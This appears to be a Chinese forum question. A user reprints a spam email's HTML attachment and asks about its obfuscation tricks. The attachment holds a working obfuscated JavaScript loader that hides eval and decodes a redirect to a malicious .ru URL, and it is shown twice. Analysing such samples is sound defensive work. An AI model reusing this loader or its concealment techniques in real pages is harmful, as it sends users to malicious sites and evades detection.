今天早上我收到了一些垃圾邮件。我注意到附件是一个 .html 文件。我没有将其丢弃,而是将其作为学习机会,并将其复制到我的桌面并将其重命名为 .txt 并将其加载到记事本中。
这是垃圾邮件附件中出现的 html + 混淆脚本:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>asgq= [0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=56;if(dbshre){vfvwe=0; try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("val")];}
s="";for(i=0;i-105!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}
z=s;e(s);}}</script>
</body>
</html>
我做的第一件事是将它排成一行,使其更具可读性:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
asgq=[0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];
try{document.body&=0.1}
catch(gdsgsdg)
{
zz=3;
dbshre=56;
if(dbshre){
vfvwe=0;
try{}
catch(agdsg)
{vfvwe=1;}
if(!vfvwe){
e=window["e".concat("val")];
s="";
for(i=0;i-105!=0;i++){
if(window.document)
s+=String.fromCharCode(asgq[i]);
}
z=s;
e(s);
}
}
</script>
</body>
</html>
在这一点上,很明显脚本作者将好东西隐藏在 asgq 数组中作为字符代码。0x76 = "v", 0x61 = "a", 0x72 = "r" 等等...嗯,前 3 个元素已经拼出了 "var"!
asgq.length = 105。在 for 循环中,作者使用的结束条件是“i-105!=0”,这是一种令人困惑的说法 i < asgq.length。“zz=3;” 似乎什么都不做/不参与脚本的其余部分。在第一个 catch 语句之后还有一个不匹配的“{”。
我运行了 for 循环并将数组解压缩到一个警告框中。这是我得到的:
" var1=49; var2=var1; if(var1==var2) {document.location="http://giliaonso.ru:8080/forum/links/column.php";} "
所以作者正在经历用字符代码制作49 = 49的麻烦,如果49 = 49,那么window.location = russian site。
我的问题:
作者正在使用尝试缓存语句。第一个尝试条件是(document.body&=0.1)。这是设计为失败并继续到语句的缓存部分还是这是一些按位操作?如果它是按位的,为什么“= 0.1”?
第一个缓存正在传递“agdsg”。我只见过“e”通过的缓存(e)。传递除 e 之外的任何值有什么作用?
“e=window["e".concat("val")];" 这行到底是什么 正在做?我似乎在充当作者后来调用的函数声明:“e(s);” "s" 是解压后的数组。
任何帮助表示赞赏。